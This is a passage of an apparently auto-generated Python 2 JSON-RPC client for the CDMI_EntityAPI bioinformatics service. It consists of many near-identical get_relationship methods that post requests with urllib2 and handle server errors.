raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasAsExemplar(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasAsExemplar',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsFamilyFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsFamilyFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_DeterminesFunctionOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_DeterminesFunctionOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsFormedOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsFormedOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsFormedInto(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsFormedInto',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsFunctionalIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsFunctionalIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasFunctional(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasFunctional',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsGroupFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsGroupFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsInGroup(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsInGroup',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsGroupingOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsGroupingOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_InAssociationDataset(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_InAssociationDataset',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsImplementedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsImplementedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Implements(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Implements',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsInOperon(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsInOperon',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_OperonContains(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_OperonContains',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsInPair(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsInPair',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsPairOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsPairOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsInstantiatedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsInstantiatedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsInstanceOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsInstanceOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsLocatedIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsLocatedIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsLocusFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsLocusFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsMeasurementMethodOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsMeasurementMethodOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_WasMeasuredBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_WasMeasuredBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsModeledBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsModeledBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Models(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Models',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsModifiedToBuildAlignment(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsModifiedToBuildAlignment',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsModificationOfAlignment(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsModificationOfAlignment',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsModifiedToBuildTree(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsModifiedToBuildTree',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsModificationOfTree(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsModificationOfTree',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsOwnerOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsOwnerOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsOwnedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsOwnedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsParticipatingAt(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsParticipatingAt',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_ParticipatesAt(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_ParticipatesAt',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
